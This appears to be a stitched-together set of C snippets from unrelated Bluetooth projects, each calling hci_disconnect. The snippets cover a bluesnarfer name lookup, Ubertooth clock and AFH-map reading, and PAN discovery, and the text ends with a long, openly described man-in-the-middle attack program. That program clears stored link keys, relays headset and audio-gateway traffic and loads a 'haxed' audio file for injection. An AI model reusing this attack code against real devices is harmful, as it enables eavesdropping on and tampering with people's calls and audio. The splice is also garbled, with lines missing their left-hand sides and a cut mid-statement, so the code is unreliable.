int bt_disconnect(char bdaddr[18]) { int err = 0, dd; struct hci_conn_info_req *cr = 0; // find the connection handle to the specified bluetooth device cr = (struct hci_conn_info_req*) malloc( sizeof(struct hci_conn_info_req) + sizeof(struct hci_conn_info)); str2ba(bdaddr, &cr->bdaddr); cr->type = ACL_LINK; dd = hci_open_dev(hci_get_route(&cr->bdaddr)); if (dd < 0) { err = dd; goto cleanup; } err = ioctl(dd, HCIGETCONNINFO, (unsigned long) cr); if (err) goto cleanup; hci_disconnect(dd, cr->conn_info->handle, HCI_OE_USER_ENDED_CONNECTION, HCI_REQ_TIMEOUT); cleanup: free(cr); if (dd >= 0) close(dd); return err; }
int bt_get_remote_name(char *str_bdaddr) { struct hci_conn_info_req cr; int dd, cc, handler; char name[248]; bdaddr_t bdaddr; if ((dd = hci_open_dev(device)) < 0) { fprintf(stderr, "bluesnarfer: hci_open_dev : %s\n", strerror(errno)); return -1; } str2ba(str_bdaddr, &bdaddr); memcpy(&cr.bdaddr, &bdaddr, sizeof(bdaddr_t)); cr.type = ACL_LINK; if (ioctl(dd, HCIGETCONNINFO, (unsigned long) &cr) < 0) { if ((cc = hci_create_connection(dd, &bdaddr, htobs(HCI_DM1 | HCI_DH1), 0, 0, (void *)&handler, 25000)) < 0) { fprintf(stderr, "bluesnarfer: hci_create_connection failed\n"); hci_close_dev(dd); return -1; } } if (hci_read_remote_name(dd, &bdaddr, 248, name, 25000)) { fprintf(stderr, "bluesnarfer: hci_read_remote_name failed\n"); hci_close_dev(dd); hci_disconnect(dd, handler, HCI_OE_USER_ENDED_CONNECTION, 10000); return -1; } printf("device name: %s\n", name); if (cc) hci_disconnect(dd, handler, HCI_OE_USER_ENDED_CONNECTION, 10000); hci_close_dev(dd); return 0; }
int HCI::disconnect(uint16_t handle) { if(hci_disconnect(_hci_sock, handle, HCI_OE_USER_ENDED_CONNECTION, 1000)) { err::code = err::LIB_SYS; return -1; } return 0; }
void disconnect_from_device(int dev_id, uint16_t handle) { if (dev_id < 0) dev_id = hci_get_route(NULL); if ((typ.dd = hci_open_dev(dev_id)) < 0) die("Could not open device\n"); typ.err = hci_disconnect(typ.dd, handle, HCI_OE_USER_ENDED_CONNECTION, 10000); if (typ.err < 0) die("Could not disconnect\n"); hci_close_dev(typ.dd); }
/* * l2cap_disconnected_ind(): * * Called by L2CAP to indicate that remote L2CAP protocol disconnected. * Disconnects the RFCOMM protocol and the ACL link before it initializes a search for * other devices. * */ err_t l2cap_disconnected_ind(void *arg, struct l2cap_pcb *pcb, err_t err) { err_t ret = ERR_OK; LWIP_DEBUGF(BT_SPP_DEBUG, ("l2cap_disconnected_ind: L2CAP disconnected\n")); if(pcb->psm == SDP_PSM) { sdp_lp_disconnected(pcb); l2cap_close(pcb); } else if(pcb->psm == RFCOMM_PSM) { ret = rfcomm_lp_disconnected(pcb); /* We can do this since we know that we are the only channel on the ACL link. * If ACL link already is down we get an ERR_CONN returned */ hci_disconnect(&(pcb->remote_bdaddr), HCI_OTHER_END_TERMINATED_CONN_USER_ENDED); l2cap_close(pcb); bt_spp_start(); } return ret; }
static int l2cap_bluez_disconnect(int channel) { int result = 0; int dd; if ((dd = hci_open_dev(channels.channels[channel].devid)) < 0) { perror("hci_open_dev"); return -1; } if(hci_disconnect(dd, channels.channels[channel].handle, HCI_OE_USER_ENDED_CONNECTION, 5*HCI_REQ_TIMEOUT) < 0) { perror("hci_disconnect"); result = -1; } hci_close_dev(dd); return result; }
int get_rssi(bdaddr_t *bdaddr, struct hci_state current_hci_state) { struct hci_dev_info di; if (hci_devinfo(current_hci_state.device_id, &di) < 0) { perror("Can't get device info"); return(-1); } uint16_t handle; // int hci_create_connection(int dd, const bdaddr_t *bdaddr, uint16_t ptype, uint16_t clkoffset, uint8_t rswitch, uint16_t *handle, int to); // HCI_DM1 | HCI_DM3 | HCI_DM5 | HCI_DH1 | HCI_DH3 | HCI_DH5 if (hci_create_connection(current_hci_state.device_handle, bdaddr, htobs(di.pkt_type & ACL_PTYPE_MASK), 0, 0x01, &handle, 25000) < 0) { perror("Can't create connection"); // TODO close(dd); return(-1); } sleep(1); struct hci_conn_info_req *cr = malloc(sizeof(*cr) + sizeof(struct hci_conn_info)); bacpy(&cr->bdaddr, bdaddr); cr->type = ACL_LINK; if(ioctl(current_hci_state.device_handle, HCIGETCONNINFO, (unsigned long) cr) < 0) { perror("Get connection info failed"); return(-1); } int8_t rssi; if(hci_read_rssi(current_hci_state.device_handle, htobs(cr->conn_info->handle), &rssi, 1000) < 0) { perror("Read RSSI failed"); return(-1); } printf("RSSI return value: %d\n", rssi); free(cr); usleep(10000); hci_disconnect(current_hci_state.device_handle, handle, HCI_OE_USER_ENDED_CONNECTION, 10000); }
int main(int argc, char *argv[]) { int opt, sock, dev_id, lap = 0, uap = 0, delay = 5; int have_lap = 0; int have_uap = 0; int afh_enabled = 0; uint8_t mode, afh_map[10]; char *end, ubertooth_device = -1; char *bt_dev = "hci0"; char addr[19] = { 0 }; struct libusb_device_handle *devh = NULL; uint32_t clock; uint16_t accuracy, handle, offset; bdaddr_t bdaddr; btbb_piconet *pn; struct hci_dev_info di; int cc = 0; pn = btbb_piconet_new(); while ((opt=getopt(argc,argv,"hl:u:U:e:d:ab:w:")) != EOF) { switch(opt) { case 'l': lap = strtol(optarg, &end, 16); if (end != optarg) { ++have_lap; } break; case 'u': uap = strtol(optarg, &end, 16); if (end != optarg) { ++have_uap; } break; case 'U': ubertooth_device = atoi(optarg); break; case 'e': max_ac_errors = atoi(optarg); break; case 'd': dumpfile = fopen(optarg, "w"); if (dumpfile == NULL) { perror(optarg); return 1; } break; case 'a': afh_enabled = 1; break; case 'b': bt_dev = optarg; if (bt_dev == NULL) { perror(optarg); return 1; } break; case 'w': //wait delay = atoi(optarg); break; case 'h': default: usage(); return 1; } } dev_id = hci_devid(bt_dev); sock = hci_open_dev(dev_id); hci_read_clock(sock, 0, 0, &clock, &accuracy, 0); if ((have_lap != 1) || (have_uap != 1)) { printf("No address given, reading address from device\n"); hci_read_bd_addr(sock, &bdaddr, 0); lap = bdaddr.b[0] | bdaddr.b[1] << 8 | bdaddr.b[2] << 16; btbb_init_piconet(pn, lap); uap = bdaddr.b[3]; btbb_piconet_set_uap(pn, uap); printf("LAP=%06x UAP=%02x\n", lap, uap); } else if (have_lap && have_uap) { btbb_init_piconet(pn, lap); btbb_piconet_set_uap(pn, uap); printf("Address given, assuming address is remote\n"); sprintf(addr, "00:00:%02X:%02X:%02X:%02X", uap, (lap >> 16) & 0xFF, (lap >> 8) & 0xFF, lap & 0xFF ); str2ba(addr, &bdaddr); printf("Address: %s\n", addr); if (hci_devinfo(dev_id, &di) < 0) { perror("Can't get device info"); return 1; } if (hci_create_connection(sock, &bdaddr, htobs(di.pkt_type & ACL_PTYPE_MASK), 0, 0x01, &handle, 25000) < 0) { perror("Can't create connection"); return 1; } sleep(1); cc = 1; if (hci_read_clock_offset(sock, handle, &offset, 1000) < 0) { perror("Reading clock offset failed"); } clock += offset; //Experimental AFH map reading from remote device if(afh_enabled) { if(hci_read_afh_map(sock, handle, &mode, afh_map, 1000) < 0) { perror("HCI read AFH map request failed"); //exit(1); } if(mode == 0x01) { btbb_piconet_set_afh_map(pn, afh_map); btbb_print_afh_map(pn); } else { printf("AFH disabled.\n"); afh_enabled = 0; } } if (cc) { usleep(10000); hci_disconnect(sock, handle, HCI_OE_USER_ENDED_CONNECTION, 10000); } } else {
int cmd_pan_discovery(struct command *cmd) { int role = AFFIX_PAN_NAP; int fd, i, found = 0; __u32 length = 8; int err; INQUIRY_ITEM devs[20]; char *devnames[20]; char name[248]; __u8 num; uint16_t ServiceID; uint16_t count; slist_t *searchList = NULL; slist_t *attrList = NULL; slist_t *svcList = NULL; sdpsvc_t *svcRec; struct sockaddr_affix saddr; __argv = &__argv[optind]; if (*__argv) { role = str2role(*__argv); if (!role) { fprintf(stderr, "invalid role: %s\n", *__argv); return 1; } if (*(++__argv)) sscanf(*__argv, "%x", &length); } fd = hci_open(btdev); if (fd < 0) { printf("Unable to open device %s: %s\n", btdev, strerror(errno)); return -1; } printf("Searching %d sec ...\n", length); err = HCI_Inquiry(fd, length, 20, devs, &num); if (err) { fprintf(stderr, "%s\n", hci_error(err)); exit(1); } if (num == 0) { printf("done.\nNo devices found.\n"); } else { printf("Searching done. Checking for service %s ...\n", role2str(role)); btdev_cache_reload(); btdev_cache_retire(); for (i = 0; i < num; i++) { if (!(devs[i].Class_of_Device & HCI_COD_NETWORKING)) continue; = PF_AFFIX; saddr.bda = devs[i].bda; saddr.devnum = HCIDEV_ANY; printf("% 2d: %s ", ++found, bda2str(&saddr.bda)); devs[i].Clock_Offset |= 0x8000; err = HCI_RemoteNameRequest(fd, &devs[i], name); if (!err) devnames[i] = strdup(name); else devnames[i] = NULL; printf("(%s)... ", name); #if defined(CONFIG_AFFIX_SDP) if (role == AFFIX_PAN_NAP) ServiceID = SDP_UUID_NAP; else if (role == AFFIX_PAN_GN) ServiceID = SDP_UUID_GN; else ServiceID = SDP_UUID_PANU; /* search for service ServiceID */ s_list_append_uuid16(&searchList, ServiceID); /* set attributes to find */ s_list_append_uint(&attrList, SDP_ATTR_SERVICE_RECORD_HANDLE); s_list_append_uint(&attrList, SDP_ATTR_PROTO_DESC_LIST); err = __sdp_search_attr_req(&saddr, searchList, IndividualAttributes, attrList, 0xffff, &svcList, &count); s_list_destroy(&searchList); s_list_free(&attrList); hci_disconnect(&saddr); if (err) { //fprintf(stderr, "%s\n", sdp_error(err)); printf("no\n"); continue; } if (count == 0) { printf("no\n"); continue; } printf("yes\n"); svcRec = s_list_dequeue(&svcList); sdp_free_svc(svcRec); sdp_free_svclist(&svcList); //hci_get_conn(); #else fprintf(stderr, "Affix SDP support disabled at compile time!\n"); break; #endif __btdev_cache_add(devs[i].bda, devs[i].Class_of_Device, devnames[i]); if (devnames[i]) free(devnames[i]); } btdev_cache_save(); } close(fd); return 0; }
void extra_info(int dd, int dev_id, bdaddr_t* bdaddr) { uint16_t handle, offset; uint8_t features[8], max_page = 0; char name[249], *tmp; char addr[19] = { 0 }; uint8_t mode, afh_map[10]; struct hci_version version; struct hci_dev_info di; struct hci_conn_info_req *cr; int i, cc = 0; if (hci_devinfo(dev_id, &di) < 0) { perror("Can't get device info"); exit(1); } printf("Requesting information ...\n"); cr = malloc(sizeof(*cr) + sizeof(struct hci_conn_info)); if (!cr) { perror("Can't get connection info"); exit(1); } bacpy(&cr->bdaddr, bdaddr); cr->type = ACL_LINK; if (ioctl(dd, HCIGETCONNINFO, (unsigned long) cr) < 0) { if (hci_create_connection(dd, bdaddr, htobs(di.pkt_type & ACL_PTYPE_MASK), 0, 0x01, &handle, 25000) < 0) { perror("Can't create connection"); return; } sleep(1); cc = 1; } else handle = htobs(cr->conn_info->handle); ba2str(bdaddr, addr); printf("\tBD Address: %s\n", addr); if (hci_read_remote_name(dd, bdaddr, sizeof(name), name, 25000) == 0) printf("\tDevice Name: %s\n", name); if (hci_read_remote_version(dd, handle, &version, 20000) == 0) { char *ver = lmp_vertostr(version.lmp_ver); printf("\tLMP Version: %s (0x%x) LMP Subversion: 0x%x\n" "\tManufacturer: %s (%d)\n", ver ? ver : "n/a", version.lmp_ver, version.lmp_subver, bt_compidtostr(version.manufacturer), version.manufacturer); if (ver) bt_free(ver); } memset(features, 0, sizeof(features)); hci_read_remote_features(dd, handle, features, 20000); if ((di.features[7] & LMP_EXT_FEAT) && (features[7] & LMP_EXT_FEAT)) hci_read_remote_ext_features(dd, handle, 0, &max_page, features, 20000); printf("\tFeatures%s: 0x%2.2x 0x%2.2x 0x%2.2x 0x%2.2x " "0x%2.2x 0x%2.2x 0x%2.2x 0x%2.2x\n", (max_page > 0) ? " page 0" : "", features[0], features[1], features[2], features[3], features[4], features[5], features[6], features[7]); tmp = lmp_featurestostr(features, "\t\t", 63); printf("%s\n", tmp); bt_free(tmp); for (i = 1; i <= max_page; i++) { if (hci_read_remote_ext_features(dd, handle, i, NULL, features, 20000) < 0) continue; printf("\tFeatures page %d: 0x%2.2x 0x%2.2x 0x%2.2x 0x%2.2x " "0x%2.2x 0x%2.2x 0x%2.2x 0x%2.2x\n", i, features[0], features[1], features[2], features[3], features[4], features[5], features[6], features[7]); } if (hci_read_clock_offset(dd, handle, &offset, 1000) < 0) { perror("Reading clock offset failed"); exit(1); } printf("\tClock offset: 0x%4.4x\n", btohs(offset)); if(hci_read_afh_map(dd, handle, &mode, afh_map, 1000) < 0) { perror("HCI read AFH map request failed"); } if(mode == 0x01) { // DGS: Replace with call to btbb_print_afh_map - need a piconet printf("\tAFH Map: 0x"); for(i=0; i<10; i++) printf("%02x", afh_map[i]); printf("\n"); } else { printf("AFH disabled.\n"); } free(cr); if (cc) { usleep(10000); hci_disconnect(dd, handle, HCI_OE_USER_ENDED_CONNECTION, 10000); } }
void main() { // ------ Pairing stuff ------ // These are some known MACs for devices we'll be using in the demonstration // "00:11:67:F8:8A:D1" - JAM Headphones // "FC:58:FA:3A:49:08" - Perchik's bluetooth speaker // Dongel - "00:01:95:27:45:51" // Shay mac - 60:F8:1D:C0:95:15 const char* dest1_mac = "FC:58:FA:3A:49:08"; // Audio Sink const char* dest2_mac = "78:D7:5F:A2:7E:4A"; // Audio Gateway const char* local_mac = "60:F8:1D:C0:95:15"; // Local Controller bdaddr_t bdaddr1, bdaddr2; int dev_id = 0, dev_sock = 0, err, attempts; uint16_t conn1_handle, conn2_handle; uint16_t packet_type; struct hci_conn_info_req *conn_info_request; struct hci_dev_info dev_info; // SDP stuff - use these for SDP querying for RFCOMM channels with sdp_lookup_uuid_rfcomm_channel below uint16_t headset_uuid16 = 0x1108; uint16_t headset_gate_uuid16 = 0x1112; uint16_t hfp_gate_uuid16 = 0x111F; uint16_t hfp_uuid16 = 0x111E; uint16_t a2dp_src_uuid16 = 0x110A; uint16_t a2dp_sink_uuid16 = 0x110B; // RFCOMM/SCO stuff struct sockaddr_rc remote1, remote2; struct sockaddr_rc local; struct sockaddr_sco sco_remote; struct sco_options sco_conn_options; wanted_rfcomm_sock_res server_rfcomm_sock; socklen_t optlen; // RFCOMM Channels for known demonstration devices: // iPhone: 8 // JAM Headphones: 1 // Perchik speakers: 3 int rfcomm_sock1 = -1, rfcomm_sock2 = -1, rfcomm_channel1 = 1, rfcomm_channel2 = 8, sco_sock, sco_conn_enabled = 0; int32_t recv_len = 0, packet_seq, audio_i, pkt_i, audio1_sent_amt = 0; uint8_t* recv_buf = (uint8_t*)malloc(RECV_BUF_SIZE); int sco_sock1 = -1, sco_sock2 = -1; int is_server = 0; int ag2hs, hs2ag, ag2hs_sco, hs2ag_sco, ag2hs_sdp, hs2ag_sdp, ag2hs_avctp, hs2ag_avctp, ag2hs_avdtp, hs2ag_avdtp, ag2hs_audio, hs2ag_audio; // L2CAP stuff int avdtp_sock1, avdtp_sock2, avctp_sock1, avctp_sock2, audio_sock1, audio_sock2, sdp_sock1, sdp_sock2, connected = 0, sdp_chann_enabled, audio_sock1_imtu, audio_sock1_omtu = DEFAULT_L2CAP_MTU, sdp1_omtu, sdp1_imtu; l2cap_sock_info sdp_sock_res, rfcomm_sock_res, server_avctp_sock_res, server_avdtp_sock_res; uint8_t *l2cap_buf = (uint8_t*)malloc(1500); FILE* test_audio_file = NULL; FILE* haxed_audio_file = fopen("audiodump_in.sbc", "rb"); str2ba(dest1_mac, &bdaddr1); str2ba(dest2_mac, &bdaddr2); dev_id = hci_get_route(NULL); dev_sock = hci_open_dev(dev_id); printf("Looking up device RFCOMM channels...\n"); // Find RFCOMM channels on both devices - uncomment to discover channels for new devices // WARNING: Set a return after these functions or Ctrl+C the program after SDP querying is over. // Do not continue to the MITM attack after a SDP query! It simply won't work. //rfcomm_channel1 = sdp_lookup_uuid_rfcomm_channel(&bdaddr1, hfp_uuid16); //rfcomm_channel2 = sdp_lookup_uuid_rfcomm_channel(&bdaddr2, hfp_gate_uuid16); printf("Audio source: %u, Audio sink: %u\n", rfcomm_channel2, rfcomm_channel1); // Get connection handles to both entities /*if ((err = ioctl(dev_sock, HCIGETCONNINFO, (unsigned long)conn_info_request)) < 0)*/ if (-1 == hci_devinfo(dev_id, &dev_info)) { printf("Failed to get devinfo\n"); goto cleanup; } packet_type = htobs(dev_info.pkt_type & ACL_PTYPE_MASK); printf("Connecting to dev1...\n"); if (-1 == hci_create_connection(dev_sock, &bdaddr1, packet_type, 0, 1, &conn1_handle, 25000)) { printf("Failed to manually create connection 1\n"); goto cleanup; } if ((err = hci_authenticate_link(dev_sock, htobs(conn1_handle), 10000)) < 0) { printf("Failed to authenticate link 1 (%d)\n", err); if ((err = hci_delete_stored_link_key(dev_sock, &bdaddr1, 1, 1000)) < 0) { printf("Failed to clear link 1 keys...\n"); goto cleanup; } if ((err = hci_change_link_key(dev_sock, htobs(conn1_handle), 5000)) < 0) { printf("Failed to change link 1 key\n"); goto cleanup; } printf("Cleared link1 keys, attempting auth again...\n"); if ((err = hci_authenticate_link(dev_sock, htobs(conn1_handle), 10000)) < 0) { printf("Failed to reauthenticate link 1 (%d)\n", err); goto cleanup; } } if ((err = hci_encrypt_link(dev_sock, htobs(conn1_handle), 1, 10000)) < 0) { printf("Failed to encrypt link 1\n"); goto cleanup; } printf("Dev1 secured\n"); sleep(3); printf("Connecting to dev2...\n"); if (-1 == hci_create_connection(dev_sock, &bdaddr2, packet_type, 0, 1, &conn2_handle, 25000)) { printf("Failed to manually create connection 2\n"); goto cleanup; } if ((err = hci_authenticate_link(dev_sock, htobs(conn2_handle), 10000)) < 0) { printf("Failed to authenticate link 2 (%d)\n", err); if ((err = hci_delete_stored_link_key(dev_sock, &bdaddr2, 1, 1000)) < 0) { printf("Failed to clear link 1 keys...\n"); goto cleanup; } printf("Cleared link2 keys, attempting auth again...\n"); if ((err = hci_change_link_key(dev_sock, htobs(conn2_handle), 5000)) < 0) { printf("Failed to change link 2 key\n"); goto cleanup; } if ((err = hci_authenticate_link(dev_sock, htobs(conn2_handle), 10000)) < 0) { printf("Failed to reauthenticate link 2 (%d)\n", err); goto cleanup; } } if ((err = hci_encrypt_link(dev_sock, htobs(conn2_handle), 1, 10000)) < 0) { printf("Failed to encrypt link 2\n"); goto cleanup; } printf("Dev2 secured\n"); printf("Got connection handles: <%s, %u>, <%s, %u>\n", dest1_mac, conn1_handle, dest2_mac, conn2_handle); printf("Disconnecting ACL connections to connect via RFCOMM...\n"); hci_disconnect(dev_sock, conn1_handle, HCI_OE_USER_ENDED_CONNECTION, 3000); hci_disconnect(dev_sock, conn2_handle, HCI_OE_USER_ENDED_CONNECTION, 3000); printf("Waiting for HCI to finish disconnecting...\n"); sleep(1); printf("Initiating RFCOMM Communications\n"); /* rfcomm_sock1 = socket(AF_BLUETOOTH, SOCK_STREAM, BTPROTO_RFCOMM); remote1.rc_family = AF_BLUETOOTH; remote1.rc_channel = rfcomm_channel1; str2ba(dest1_mac, &remote1.rc_bdaddr); for (attempts = 0, err = -1; attempts < 3 && err < 0; attempts++) { if ((err = connect(rfcomm_sock1, (struct sockaddr *)&remote1, sizeof(struct sockaddr_rc))) < 0) { printf("Failed to connect RFCOMM 1 (%d)\n", err); } } if (err < 0) goto rfcomm_sock_cleanup; */ /* rfcomm_sock_res.psm = PSM_RFCOMM; rfcomm_sock_res.res_sock = -1; printf("Waiting for phone on L2CAP...\n"); start_l2cap_conn_wait(&rfcomm_sock_res); while (rfcomm_sock_res.res_sock <0); printf("Accepted on l2cap!\n"); rfcomm_sock2 = rfcomm_sock_res.res_sock; */ /* rfcomm_sock2 = socket(AF_BLUETOOTH, SOCK_STREAM, BTPROTO_RFCOMM); remote2.rc_family = AF_BLUETOOTH; remote2.rc_channel = rfcomm_channel2; str2ba(dest2_mac, &remote2.rc_bdaddr); for (attempts = 0, err = -1; attempts < 3 && err < 0; attempts++) { if ((err = connect(rfcomm_sock2, (struct sockaddr *)&remote2, sizeof(struct sockaddr_rc))) < 0) { printf("Failed to connect RFCOMM 2 (%d)\n", err); } } if (err < 0) goto rfcomm_sock_cleanup; */ /* rfcomm_sock1 = connect_l2cap(dest1_mac, PSM_RFCOMM); rfcomm_sock2 = connect_l2cap(dest2_mac, PSM_RFCOMM); if (rfcomm_sock1 <= 0 || rfcomm_sock2 <= 0) { printf("Failed to connect RFCOMM/L2CAP. %d - %d\n", rfcomm_sock1, rfcomm_sock2); goto rfcomm_sock_cleanup; } */ // printf("RFCOMM communications started. Setting to nonblocking I/O.\n"); /* if (fcntl(rfcomm_sock1, F_SETFL, O_NONBLOCK) < 0) { printf("Failed to make RFCOMM socket nonblocking\n"); goto rfcomm_sock_cleanup; } if (fcntl(rfcomm_sock2, F_SETFL, O_NONBLOCK) < 0) { printf("Failed to make RFCOMM socket nonblocking\n"); goto rfcomm_sock_cleanup; } */ avdtp_sock1 = avdtp_sock2 = avctp_sock1 = avctp_sock2 = sdp_sock1 = sdp_sock2 = -1; /* printf("Attempting to connect L2CAP sockets...\n"); printf("Side 1 AVDTP/AVCTP...\n"); avdtp_sock1 = connect_l2cap(dest1_mac, PSM_AVDTP); avctp_sock1 = connect_l2cap(dest1_mac, PSM_AVCTP); if (avdtp_sock1 < 0 || avctp_sock1 < 0) { printf("Failed to setup L2CAP links... %d - %d\n", avctp_sock1, avdtp_sock1); goto l2cap_sock_cleanup; } printf("Side 2 AVDTP/AVCTP...\n"); avdtp_sock2 = connect_l2cap(dest2_mac, PSM_AVDTP); avctp_sock2 = connect_l2cap(dest2_mac, PSM_AVCTP); if (avdtp_sock2 < 0 || avctp_sock2 < 0) { printf("Failed to setup L2CAP links... %d - %d\n", avctp_sock1, avdtp_sock1); goto l2cap_sock_cleanup; } */ //start_sco_conn_wait(&sco_sock2); // Bind a L2CAP socket to wait for the slave to probe our SDP server sdp_sock_res.psm = PSM_SDP; sdp_sock_res.res_sock = -1; start_l2cap_conn_wait(&sdp_sock_res); // Bind two L2CAP sockets to wait for the slave to connect to our AVDTP and AVCTP service ports server_avctp_sock_res.psm = PSM_AVCTP; server_avdtp_sock_res.psm = PSM_AVDTP; start_l2cap_conn_wait(&server_avctp_sock_res); start_l2cap_conn_wait(&server_avdtp_sock_res); //start_sco_conn_wait(&sco_sock2); server_rfcomm_sock.res_sock = -1; = rfcomm_channel1; //start_rfcomm_conn_wait(&server_rfcomm_sock); sdp_chann_enabled = 0; sco_conn_enabled = 0; sco_sock1 = sdp_sock1 = -1; is_server = 0; rfcomm_sock2 = connect_rfcomm(dest2_mac, local_mac, rfcomm_channel2); printf("Opened AG RFCOMM connection\n"); // Make pipes if (0 > mknod("bt_hs2ag", S_IFIFO | 0666, 0)) { printf("Failed to open pipe :(\n"); goto rfcomm_sock_cleanup; } if (0 > mknod("bt_ag2hs", S_IFIFO | 0666, 0)) { printf("Failed to open pipe :(\n"); goto rfcomm_sock_cleanup; } if (0 > mknod("bt_hs2ag_sco", S_IFIFO | 0666, 0)) { printf("Failed to open pipe :(\n"); goto rfcomm_sock_cleanup; } if (0 > mknod("bt_ag2hs_sco", S_IFIFO | 0666, 0)) { printf("Failed to open pipe :(\n"); goto rfcomm_sock_cleanup; } if (0 > mknod("bt_hs2ag_sdp", S_IFIFO | 0666, 0)) { printf("Failed to open pipe :(\n"); goto rfcomm_sock_cleanup; } if (0 > mknod("bt_ag2hs_sdp", S_IFIFO | 0666, 0)) { printf("Failed to open pipe :(\n"); goto rfcomm_sock_cleanup; } if (0 > mknod("bt_hs2ag_avctp", S_IFIFO | 0666, 0)) { printf("Failed to open pipe :(\n"); goto rfcomm_sock_cleanup; } if (0 > mknod("bt_ag2hs_avctp", S_IFIFO | 0666, 0)) { printf("Failed to open pipe :(\n"); goto rfcomm_sock_cleanup; } if (0 > mknod("bt_hs2ag_avdtp", S_IFIFO | 0666, 0)) { printf("Failed to open pipe :(\n"); goto rfcomm_sock_cleanup; } if (0 > mknod("bt_ag2hs_avdtp", S_IFIFO | 0666, 0)) { printf("Failed to open pipe :(\n"); goto rfcomm_sock_cleanup; } if (0 > mknod("bt_hs2ag_audio", S_IFIFO | 0666, 0)) { printf("Failed to open pipe :(\n"); goto rfcomm_sock_cleanup; } if (0 > mknod("bt_ag2hs_audio", S_IFIFO | 0666, 0)) { printf("Failed to open pipe :(\n"); goto rfcomm_sock_cleanup; } printf("Forking!\n"); ag2hs = hs2ag = NULL; // Split into master and slave processes. This is because of bugs in BlueZ with connecting two sockets of the same kind // within the same process. Particularly A2DP and SCO. if (fork()) { is_server = 1; sco_sock2 = -2; ag2hs = open("bt_ag2hs", O_WRONLY | O_CREAT, 0666); hs2ag = open("bt_hs2ag", O_NONBLOCK | O_CREAT, 0666); ag2hs_sco = open("bt_ag2hs_sco", O_WRONLY | O_NONBLOCK | O_CREAT, 0666); hs2ag_sco = open("bt_hs2ag_sco", O_NONBLOCK | O_CREAT, 0666); ag2hs_sdp = open("bt_ag2hs_sdp", O_WRONLY | O_CREAT, 0666); hs2ag_sdp = open("bt_hs2ag_sdp", O_NONBLOCK | O_CREAT, 0666); ag2hs_avctp = open("bt_ag2hs_avctp", O_WRONLY | O_CREAT, 0666); hs2ag_avctp = open("bt_hs2ag_avctp", O_NONBLOCK | O_CREAT, 0666); ag2hs_avdtp = open("bt_ag2hs_avdtp", O_WRONLY | O_CREAT, 0666); hs2ag_avdtp = open("bt_hs2ag_avdtp", O_NONBLOCK | O_CREAT, 0666); ag2hs_audio = open("bt_ag2hs_audio", O_WRONLY | O_CREAT, 0666); hs2ag_audio = open("bt_hs2ag_audio", O_NONBLOCK | O_CREAT, 0666); if (fcntl(ag2hs_audio, F_SETFL, O_NONBLOCK) < 0) { printf("Failed to make ag2hs_audio fifo nonblocking\n"); } printf("Server starting\n"); /* accepter = socket(AF_BLUETOOTH, SOCK_STREAM, BTPROTO_RFCOMM); remote2.rc_family = AF_BLUETOOTH; remote2.rc_channel = rfcomm_channel2; remote2.rc_bdaddr = *BDADDR_ANY; printf("Waiting on RFCOMM2\n"); if (bind(accepter, (struct sockaddr*)&remote2, sizeof(struct sockaddr_rc)) < 0) printf("Failed to bind rfcomm\n"); if (listen(accepter, 1) < 0) printf("Failed to listen on rfcomm\n"); accepterlen = sizeof(struct sockaddr_rc); rfcomm_sock2 = accept(accepter, (struct sockaddr*)&remote2, &accepterlen); close(accepter); rfcomm_sock2 = socket(AF_BLUETOOTH, SOCK_STREAM, BTPROTO_RFCOMM); remote2.rc_family = AF_BLUETOOTH; remote2.rc_channel = rfcomm_channel2; str2ba(dest2_mac, &remote2.rc_bdaddr); for (attempts = 0, err = -1; attempts < 3 && err < 0; attempts++) { if ((err = connect(rfcomm_sock2, (struct sockaddr *)&remote2, sizeof(struct sockaddr_rc))) < 0) { printf("Failed to connect RFCOMM 2 (%d)\n", err); } } printf("Opened AG RFCOMM sock\n"); if (fcntl(rfcomm_sock2, F_SETFL, O_NONBLOCK) < 0) { printf("Failed to make RFCOMM socket nonblocking\n"); goto rfcomm_sock_cleanup; } */ } else { is_server = 0; sleep(2); ag2hs = open("bt_ag2hs", O_NONBLOCK, 0666); hs2ag = open("bt_hs2ag", O_WRONLY, 0666); ag2hs_sco = open("bt_ag2hs_sco", O_NONBLOCK, 0666); hs2ag_sco = open("bt_hs2ag_sco", O_WRONLY, 0666); ag2hs_sdp = open("bt_ag2hs_sdp", O_NONBLOCK, 0666); hs2ag_sdp = open("bt_hs2ag_sdp", O_WRONLY, 0666); ag2hs_avctp = open("bt_ag2hs_avctp", O_NONBLOCK, 0666); hs2ag_avctp = open("bt_hs2ag_avctp", O_WRONLY, 0666); ag2hs_avdtp = open("bt_ag2hs_avdtp", O_NONBLOCK, 0666); hs2ag_avdtp = open("bt_hs2ag_avdtp", O_WRONLY, 0666); ag2hs_audio = open("bt_ag2hs_audio", O_NONBLOCK, 0666); hs2ag_audio = open("bt_hs2ag_audio", O_WRONLY, 0666); printf("Client starting\n"); rfcomm_sock1 = connect_rfcomm(dest1_mac, local_mac, rfcomm_channel1); printf("Opened HS RFCOMM connection\n"); /* rfcomm_sock1 = socket(AF_BLUETOOTH, SOCK_STREAM, BTPROTO_RFCOMM); remote1.rc_family = AF_BLUETOOTH; remote1.rc_channel = rfcomm_channel1; str2ba(dest1_mac, &remote1.rc_bdaddr); for (attempts = 0, err = -1; attempts < 3 && err < 0; attempts++) { if ((err = connect(rfcomm_sock1, (struct sockaddr *)&remote1, sizeof(struct sockaddr_rc))) < 0) { printf("Failed to connect RFCOMM 1 (%d)\n", err); } } printf("Opened HS RFCOMM sock\n"); if (fcntl(rfcomm_sock1, F_SETFL, O_NONBLOCK) < 0) { printf("Failed to make RFCOMM socket nonblocking\n"); goto rfcomm_sock_cleanup; } */ } //printf("Got FIFO FDs: %d %d\n", ag2hs, hs2ag); /* if (0 > (err = fcntl(ag2hs, F_SETFL, O_NONBLOCK))) { printf("Failed to make AG2HS nonblocking (%d - %s)\n", errno, strerror(errno)); } if (0 > (err = fcntl(hs2ag, F_SETFL, O_NONBLOCK))) { printf("Failed to make HS2AG nonblocking (%d - %s)\n", errno, strerror(errno)); } */ while (1) { if (is_server) { // On first run, set a SCO socket to wait for the audio gateway to initiate a phone call if (-2 == sco_sock2) { sco_sock2 = -1; start_sco_conn_wait(&sco_sock2); } // Check if our SDP server has been connected to if (sdp_sock_res.res_sock != -1) { printf("We have been SDP queried! - %d\n", sdp_sock_res.res_sock); sdp_sock2 = sdp_sock_res.res_sock; sdp_sock_res.res_sock = -1; } /*if (server_rfcomm_sock.res_sock != -1) { printf("Received server RFCOMM connection!\n"); rfcomm_sock2 = server_rfcomm_sock.res_sock; server_rfcomm_sock.res_sock = -1; }*/ // Read +AT commands from master if ((recv_len = recv(rfcomm_sock2, recv_buf, RECV_BUF_SIZE, 0)) > 